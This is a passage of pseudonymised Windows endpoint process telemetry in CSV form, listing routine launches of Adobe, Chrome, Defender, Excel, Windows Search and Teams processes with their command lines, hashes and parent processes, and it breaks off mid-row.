+451,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:23:49.765853900+00:00,11624,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_078283040e9b0a98aca7d0d9108d59efb1e7f921.pdf""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:23:50.291772100+00:00,2021-06-24 03:25:40.719507400+00:00,1ad65ade-a4c4-4976-a42a-37d9b37ef74d,computerpii_0a470890c60768167990033d701e7bd881398861,174276,False,10.7740.19041.1052,False,11540474045176201,,11540474045176250,2021-06-24 03:18:58.493511600+00:00,17444,2021-06-24 03:18:58.493511600+00:00,Acrobat.exe,17444,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:18:58.497405900+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+452,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:23:50.810215600+00:00,5512,AdobeGCClient.exe,"""AdobeGCClient.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat"""" --updaterVersion=""Ipv4PII_794367fc5320f1843f142f7c572c8bf93ab236a7"" --callerId=""10""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:23:49.765853900+00:00,11624,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\""",False,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:23:50.840282100+00:00,2021-06-24 03:25:40.719573700+00:00,b89321d4-82eb-4569-bbca-569112066cee,computerpii_0a470890c60768167990033d701e7bd881398861,174277,False,10.7740.19041.1052,False,11540474045176250,,11540474045176252,2021-06-24 03:23:49.765853900+00:00,11624,2021-06-24 03:23:49.765853900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,11624,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3412680,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:23:49.765741300+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+453,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:24:17.684564300+00:00,6696,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9648 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:24:18.628936200+00:00,2021-06-24 03:25:40.720003800+00:00,ea5391b9-5b17-42ce-b89d-c056a7477b6c,computerpii_0a470890c60768167990033d701e7bd881398861,174283,False,10.7740.19041.1052,False,11540474045175164,,11540474045176261,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+454,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:24:33.641397100+00:00,11156,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0A5DBC3D-1072-59B0-19D1-594B5F20907F ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:24:34.473788500+00:00,2021-06-24 03:25:40.723967400+00:00,41de0c1d-15b3-41bf-bdc3-246da3446934,computerpii_0a470890c60768167990033d701e7bd881398861,174332,False,10.7740.19041.1052,False,11540474045145394,,11540474045176263,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+455,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:25:16.245723500+00:00,9076,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_7894fd0ab624d80bdf12958e74152650901c6f9e.xlsx""",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:25:16.640673700+00:00,2021-06-24 03:25:40.724832200+00:00,cb1f8333-78c2-4d5f-961e-32013a601fbc,computerpii_0a470890c60768167990033d701e7bd881398861,174343,False,10.7740.19041.1052,False,11540474045175171,,11540474045176264,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,OUTLOOK.EXE,16216,256,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+456,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:25:17.244713700+00:00,11572,EXCEL.EXE,"""EXCEL.EXE""  /Embedding",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:25:16.245723500+00:00,9076,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_7894fd0ab624d80bdf12958e74152650901c6f9e.xlsx""",False,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:25:17.989215800+00:00,2021-06-24 03:25:40.726268700+00:00,a28abf77-65e9-49c5-8f8c-6431267ae678,computerpii_0a470890c60768167990033d701e7bd881398861,174361,False,10.7740.19041.1052,False,11540474045176264,,11540474045176268,2021-06-24 03:25:16.245723500+00:00,9076,2021-06-24 03:25:16.245723500+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,9076,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,64015672,2021-06-03 12:57:23+00:00,2021-06-12 08:57:18.880777600+00:00,2021-06-24 03:25:16.636305400+00:00,2021-06-12 08:57:18.794658+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+457,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:51:48.833132900+00:00,16512,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Truecoin KYC\GEA collection\June\June 24\FilePII_7894fd0ab624d80bdf12958e74152650901c6f9e.xlsx""",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:51:48.977132600+00:00,2021-06-24 03:53:10.246357300+00:00,cffed2e9-6735-44b9-a506-8d805e1a01e9,computerpii_0a470890c60768167990033d701e7bd881398861,174963,False,10.7740.19041.1052,False,11540474045175127,,11540474045176417,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+458,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:52:36.287350800+00:00,5872,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320641_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320641 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:52:36.309056600+00:00,2021-06-23 01:54:31.660715600+00:00,4b377d1e-7054-4c0f-adf3-3a54487ee67f,computerpii_0a470890c60768167990033d701e7bd881398861,159238,False,10.7740.19041.1052,False,11540474045144190,,11540474045172595,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+459,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:28:30.180945300+00:00,14524,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_OGQxYjYyM2MtMGRhNi00ODk0LTg4NzctY2VjOTJiODI1YTlj%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:28:30.482784400+00:00,2021-06-23 10:30:27.179909500+00:00,4863237e-80e8-433f-8e97-c4c076e19f2c,computerpii_0a470890c60768167990033d701e7bd881398861,167135,False,10.7740.19041.1052,False,11540474045171845,,11540474045174939,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+460,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:28:31.060088300+00:00,19864,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1716,2576680148202349375,6156880601926501240,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1740 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 10:28:30.180945300+00:00,14524,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_OGQxYjYyM2MtMGRhNi00ODk0LTg4NzctY2VjOTJiODI1YTlj%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft 